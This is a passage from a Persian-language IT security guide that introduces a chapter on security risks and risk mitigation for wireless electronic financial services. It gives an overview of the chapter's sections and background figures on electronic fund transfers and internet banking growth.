‫ﺳﺎﻳﺮ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺗﻲ ﭼﻘﺪﺭ ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻀﻤﻴﻦ‬
‫ﻛﻨﻨﺪ ﺣﻴﺎﺗﻲﺗﺮ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺪﻑ ﺍﻳﻦ ﻓﺼﻞ ﺗﻮﺿـﻴﺢ ﺍﻳـﻦ‬
‫ﻣﻄﻠﺐ ﺍﺳﺖ ﻛﻪ ﭼـﺮﺍ ﻭ ﭼﮕﻮﻧـﻪ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﻳـﻚ‬
‫ﺩﻏﺪﻏﻪ ﺗﺒﺪﻳﻞ ﻣﻲ ﺷﻮﺩ ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﺑﺪﻭﻥ ﭘﺮﺩﺍﺧﺖ ﻫﺰﻳﻨﺔ‬
‫ﺍﺿﺎﻓﻲ ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﻛﺎﻫﺶ‬
‫ﺩﺍﺩ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﺔ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻊ‬
‫ﻓﻨــﺎﻭﺭﻱ ﺍﻣﻜــﺎﻥ ﺍﺭﺍﺋــﻪ ﺭﺍﻫﻜﺎﺭﻫــﺎﻱ ﺛﺎﺑــﺖ ﻭ ﺗﻐﻴﻴﺮﻧﺎﭘــﺬﻳﺮ ﺭﺍ ﺍﺯ‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺳـﻠﺐ ﻛـﺮﺩﻩ‪ ،‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺍﻗﺪﺍﻣﺎﺗﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺻﻴﻪ ﺷﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﭼﻨﺪﻻﻳﻪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻣـﻲﺑﺎﺷـﻨﺪ‪ ،‬ﻭ‬
‫ﻧﻤﺎﻳــﺎﻧﮕﺮ ﺁﻧﭽــﻪ ﺍﻣــﺮﻭﺯ ﺑﻌﻨــﻮﺍﻥ ﺍﻟﮕﻮﻫــﺎﻱ ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻳﺮ ﺗﻘﺴﻴﻢ ﺷﺪﻩ‪ :‬ﻗﺴﻤﺖ "ﺍﻟﻒ" ﺧﻮﺍﻧﻨﺪﻩ‬
‫ﺭﺍ ﺑﺎ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻭ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺁﺷﻨﺎ ﻣﻲﻛﻨﺪ؛ ﻗﺴﻤﺖ "ﺏ" ﺑﻪ ﻣﻌﺮﻓﻲ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺫﺍﺗﻲ ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﻣﻲ ﭘﺮﺩﺍﺯﺩ؛ ﻗـﺴﻤﺖ "ﺝ" ﻧﻘـﺎﻁ‬
‫ﺿﻌﻒ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ ﺑـﻲﺳـﻴﻢ )‪ ١٣٣(WLANs‬ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺁﻧﻬـﺎ ﻻﺯﻡ ﻫـﺴﺘﻨﺪ ﺭﺍ‬
‫ﺷﺮﺡ ﻣﻲﺩﻫﺪ؛ ﻗﺴﻤﺖ "ﺩ" ﺑـﻪ ﺗﻜﺎﻣـﻞ ﺷـﺒﻜﻪ ﻫـﺎﻱ ﺳﺮﺍﺳـﺮﻱ‬
‫ﻣﺨﺎﺑﺮﺍﺕ ﺳﻴﺎﺭ )ﺷﺒﻜﻪﻫﺎﻱ ‪ ١٣٤(GSM‬ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬـﺎ‬
‫ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻗﺴﻤﺖ "ﻩ" ﺟﺰﺋﻴﺎﺕ ﺭﻭﺷـﻬﺎﻱ ﺻـﺤﻴﺢ ﻣﻮﺍﺟﻬـﻪ ﺑـﺎ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺷﺒﻜﻪﻫﺎﻱ ‪ GSM‬ﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲ ﺩﻫـﺪ؛ ﻗـﺴﻤﺖ "ﻭ"‬
‫ﺑﻪ ﺍﺭﺍﺋﻪ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﭘﺮﺩﺍﺧﺖ ﻣﻲﭘﺮﺩﺍﺯﺩ؛ ﻭ ﻗﺴﻤﺖ "ﺯ" ﻧﻴﺰ ﻳﻚ ﺟﻤﻊﺑﻨـﺪﻱ ﻧﻬـﺎﻳﻲ ﻭ‬
‫ﺩﻭﺭﻧﻤﺎﻳﻲ ﺍﺯ ﺁﻳﻨﺪﻩ )ﻧﺴﻞ ﺳﻮﻡ؛ ‪ (3G‬ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻫﺪﻑ ﺍﻳﻦ ﻓـﺼﻞ ﺍﺭﺍﺋـﻪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﻣـﺪﻳﺮﻳﺖ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ ﻓــﺼﻞ ﺗــﻼﺵ ﻣــﻲﻛﻨــﺪ ﺑــﺴﺘﺮﻱ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ‬
‫‪133 Wireless Local Area Networks‬‬
‫‪134 Global System for Moblile Communication‬‬
‫‪Networks‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﻣﺨﺎﻃﺮﺍﺗﻲ ﻣﻲ ﭘﺮﺩﺍﺯﻳﻢ ﻛـﻪ ﺩﺭ ﻧﺘﻴﺠـﺔ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ ﻭ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﺗـﺴﺨﻴﺮ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺳﻴـﺴﺘﻢ‪ ،‬ﻭ ﺳـﺎﻳﺮ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﻣﺸﺎﺑﻪ‪ ،‬ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻓﺼﻞ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﮔﺮﭼﻪ "ﺣﺠﻢ" ﻣﻌﺎﻣﻼﺗﻲ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ‬
‫ﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﻧﺪ ﺑﺮ ﮔﺴﺘﺮﺩﮔﻲ ﺣﻮﺯﺓ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭ ﹺ‬
‫ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺻ‪‬ـﺮﻑ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺁﺷﻜﺎﺭ ﺷﺪﻥ ﻧﻘﺎﻁ ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺎﻧﺠﺎﻣـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ‬
‫ﻓﺼﻞ ﭼﻨﺪ ﻧﻜﺘﺔ ﻣﻬﻢ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ ﻛـﻪ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﺳﻴﺴﺘﻢ )ﺑﺨﺼﻮﺹ ﺩﺭ ﺑﺎﻧﻜﻬﺎ( ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﻻ ﺑـﺪﻭﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩ ﻫﺰﻳﻨـﺔ‬
‫ﺗﺎ ﺑﻴﺸﺘﺮﻳﻦ ﺣﺪ ﻣﻤﻜﻦ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﻤﺎﻡﺷﺪﻩ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ‪ .‬ﺍﻗﺪﺍﻣﺎﺕ ﭘﻴـﺸﻨﻬﺎﺩﻱ ﺍﻳـﻦ ﻓـﺼﻞ‬
‫ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ‪ ،‬ﺑﻪ ﻧﻮﻋﻲ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺩﺭ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﺭﺍ ﻧﻴـﺰ ﺩﺭ ﺑـﺮ‬
‫ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫‪١٨٥‬‬
‫‪١٨٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪ ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻣﺤﻴﻂ ﺑﻲﺳﻴﻢ ﻗﺎﺑﻞ ﻛـﺎﺭﺑﺮﺩ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻟﻒ‪ .‬ﻛﻠﻴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫‪١٣٥‬‬
‫ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻭ ﭼـﻪ ﺑـﺎ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺭﺷــﺪ ﺳــﺮﻳﻌﻲ ﺩﺍﺷــﺘﻪﺍﻧــﺪ‪ .‬ﻛــﺸﻮﺭﻫﺎ ﻭ‬
‫ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎ ﺭﻭﻧﺪ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ‬
‫ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻧــﻪ ﺗﻨﻬــﺎ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ ﺩﺭ ﺷــﺒﻜﻪ ﺭﺍ ﮔــﺴﺘﺮﺵ‬
‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۹۰‬ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ‬
‫ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺭﺿﺎﻳﺘﻤﻨﺪﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﻭﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬
‫ﺗﻤﺮﻛﺰ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻛـﺎﻫﺶ‬
‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺛﺎﺑـﺖ ﺗﻮﺳـﻌﻪ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﻌﺐ‪،‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﺿـﺎﻓﻪ ﺭﺍ ﻧﻴـﺰ ﺣـﺬﻑ ﻛـﺮﺩﻩ ﻭ ﻫﺰﻳﻨـﻪﻫـﺎ ﺭﺍ‬
‫ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻧﺠﺎﻡ ﻳﻚ ﺗﺮﺍﻛﻨﺶ ﻋـﺎﺩﻱ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ‬
‫ﺷﻌﺒﻪ ﻳﺎ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﻫﺰﻳﻨﻪﺍﻱ ﻣﻌﺎﺩﻝ ﻳـﻚ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ ﺩﺍﺭﺩ‪،‬‬
‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻧﺠﺎﻡ ﻫﻤﺎﻥ ﺗـﺮﺍﻛﻨﺶ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻫﺰﻳﻨـﻪﺍﻱ‬
‫ﻣﻌﺎﺩﻝ ‪ ۰،۰۲‬ﺩﻻﺭ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﻫﺰﻳﻨﻪﻫﺎﻱ ﻧﺎﺯﻝ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺧـﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ‬
‫ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬
‫ﺧﺪﻣﺎﺕ ﺻﻨﻌﺘﻲ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ‬
‫ﺑﺮﺯﻳﻞ ﻫﻤﭽﻮﻥ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺑـﻪ ﻋﻠـﺖ‬
‫ﻋﺪﻡ ﻭﺟﻮﺩ ﺯﻳﺮﺳـﺎﺧﺖ ﻣﻨﺎﺳـﺐ ﺧﻄـﻮﻁ ﺩﺭ ﻏﺎﻟـﺐ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ‪ ،‬ﺑﻴـﺸﺘﺮ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺧـﺪﻣﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺩﺭ‬
‫ﺑﺴﺘﺮﻫﺎﻱ ﺑﻲﺳﻴﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩﺍﻧﺪ ﺗﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪ .‬ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺘﻬـﺎ‪ ،‬ﭼﻬـﺎﺭ ﮔـﺮﺍﻳﺶ‬
‫ﻣــﺮﺗﺒﻂ ﺑــﺎ ﻓﻨــﺎﻭﺭﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺻــﻨﻌﺖ ﺍﻳﺠــﺎﺩ ﺷــﺪﻩ ﺍﺳــﺖ‪:‬‬
‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ‪ ،‬ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ‪ ،‬ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻳﻜﭙﺎﺭﭼـﻪ‪ ،‬ﻭ ﺭﻭﺷـﻬﺎﻱ‬
‫‪١٣٦‬‬
‫ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬
‫‪ ۱۳۵‬ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﺗﺤﻠﻴﻞ ﺩﻗﻴﻘﺘﺮ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫ﻣﻨﺒـﻊ ﺯﻳـﺮ ﻧﻮﺷـﺘﺔ ‪ ،T. Kellerman ،T. Glaessener‬ﻭ ‪V.‬‬
‫‪) McNevin‬ﺳﺎﻝ ‪ (۲۰۰۲‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪"E-Security Risk Mitigation for Financial‬‬
‫"‪Transactions‬‬
‫‪136 Gilbride, Edward. Emerging Bank Technology‬‬
‫‪and the Implications for E-crime Presentation,‬‬
‫‪September 3, 2001‬‬
‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﭼﻬﺎﺭ ﻗﺴﻤﺖ ﺍﺻﻠﻲ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ‪:‬‬
‫ﺍﻧﺘﻘــﺎﻝ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ )‪ ،١٣٧(EFT‬ﺗﺒــﺎﺩﻝ ﺩﺍﺩﺓ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ )‪ ،١٣٨(EDI‬ﺍﻧﺘﻘـﺎﻝ ﺳـﻮﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )‪ ١٣٩(EBT‬ﻭ‬
‫ﺗﺄﻳﻴـــﺪ ﺗﺠـــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـــﻲ )‪ EFT .١٤٠(ETC‬ﺩﺭ ﻭﺍﻗـــﻊ‬
‫ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﺻﻮﺭﺕ ﺗﺒﺎﺩﻝ ﭘﻮﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻭﺍﻳـﻞ‬
‫ﺩﻫﺔ ‪ ۱۹۶۰‬ﻣﺮﺳﻮﻡ ﺷﺪ‪ .‬ﺩﺭ ﻣﻘﻴﺎﺱ ﺟﻬﺎﻧﻲ ﻣﻘﺪﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ‬
‫‪ EFT‬ﺩﺭ ﺩﺍﺧﻞ ﻭ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺧﺰﺍﻧـﺔ ﺍﻳـﺎﻻﺕ‬
‫ﻣﺘﺤــﺪﻩ ﻣﻴــﺰﺍﻥ ﺁﻧــﺮﺍ ﺣــﺪﻭﺩ ‪ ۲‬ﺗﺮﻳﻠﻴــﻮﻥ ﺩﻻﺭ ﺩﺭ ﺭﻭﺯ ﻳــﺎ ‪۷۰۰‬‬
‫ﺗﺮﻳﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﺍﺳـﺖ‪ .‬ﺑﺨـﺶ ﻋﻤـﺪﻩﺍﻱ ﺍﺯ‬
‫ﻲ ﺷــﺒﻜﺔ ‪ SWIFT‬ﺑﻮﺳــﻴﻠﺔ ﺧﻄــﻮﻁ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ‬
‫‪ EFT‬ﺑــﺎﻧﻜ ﹺ‬
‫ﻣﺎﻫﻮﺍﺭﻩ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺣـﺪﻭﺩﹰﺍ ﻧﻴﻤـﻲ ﺍﺯ ‪۲۰۰‬‬
‫ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺑﺰﺭﮒ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺧﻄﻮﻁ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻏﺎﻟﺐ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺍﺯ‬
‫ﻟﺤﺎﻅ ﺍﻗﺘﺼﺎﺩﻱ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺘﻪ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﺎﻋـﺚ‬
‫ﺗﺮﺍﻓﻴﻚ ﺯﻳﺎﺩ ﻭ ﺣﺠﻢ ﻭﺳﻴﻊ ﻋﻤﻠﻴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲ ﺷﻮﺩ؛ ﻭ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻠﻪ ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺩﻏﺪﻏﺔ ﺑـﺰﺭﮒ‬
‫ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪ ١٤١.‬ﺗﺎ ﺳﺎﻝ ‪ ۲۰۰۵‬ﺳﻬﻢ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬
‫ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻﻨﻌﺘﻲ ﺍﺯ ‪ %۸،۵‬ﺑﻪ ‪ %۵۰‬ﻭ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺭﺷﺪ ﺍﺯ ‪ %۱‬ﺑﻪ ‪ %۱۰‬ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ‪ .‬ﺩﺭﺻـﻮﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺑﻬﺘـﺮ‬
‫ﺍﺗﺼﺎﻻﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۵‬ﺗﺎ ‪ %۲۰‬ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑﻨـﺪ؛ ﻛـﻪ‬
‫ﺭﻗﻤـــﻲ ﺑـــﻴﺶ ﺍﺯ ﺷـــﺶ ﺗﺮﻳﻠﻴـــﻮﻥ ﺩﻻﺭ ﻣﻌﺎﻣﻠـــﺔ ﺍﻳﻨﺘﺮﻧﺘـــﻲ‬
‫‪١٤٣‬‬
‫ﺗﺠﺎﺭﺕ‪-‬ﺑﻪ‪-‬ﺗﺠﺎﺭﺕ )‪ ١٤٢(B2B‬ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺩﺭ ﭘﻲ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻚ ﻧﮕـﺮﺵ ﺩﻳﮕـﺮ ﻧﻴـﺰ‬
‫ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﺍﺳﺖ‪ :‬ﮔﺴﺘﺮﺵ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻛﺎﺭﺑﺮﺩ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
